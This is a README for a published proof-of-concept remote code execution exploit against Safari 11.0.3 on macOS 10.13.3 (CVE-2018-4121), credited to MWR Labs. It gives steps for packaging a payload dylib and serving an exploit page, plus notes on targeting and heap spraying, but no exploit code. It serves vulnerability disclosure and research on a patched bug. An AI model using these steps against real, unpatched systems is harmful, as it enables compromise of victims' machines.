CVE-2018-4121 - Safari Wasm Sections POC RCE Exploit by MWR Labs (c) 2018 Details this proof of concept exploit targets Safari 11.0.3 (13604.5.6) on macOS 10.13.3 (17D47) versions only. compile the payload of your choice as a dylib with a constructor run python file_to_jsarray.py your.dylib payload.js serve this directory and point Safari to /exploit.html exploit is not fully reliable and uses hardcoded offsets for this macOS/Safari version. exploit takes a while to run due to the size of the heap spray (24.5GB). this issue is addressed in macOS 10.13.4 as CVE-2018-4121 (https://support.apple.com/en-gb/HT208692) Credits Natalie Silvanovich of Google Project Zero - https://bugs.chromium.org/p/project-zero/issues/detail?id=1522 Ian Beer of Google Project Zero - https://googleprojectzero.blogspot.co.uk/2014/07/pwn4fun-spring-2014-safari-part-i_24.html Phoenhex - https://phoenhex.re/ Fermin Serna - https://media.blackhat.com/bh-us-12/Briefings/Serna/BH_US_12_Serna_Leak_Era_Slides.pdf References https://labs.mwrinfosecurity.com/assets/BlogFiles/apple-safari-wasm-section-vuln-write-up-2018-04-16.pdf https://labs.mwrinfosecurity.com/mwr-vulnerability-disclosure-policy https://www.mwrinfosecurity.com/about-us/ Sursa: https://github.com/mwrlabs/CVE-2018-4121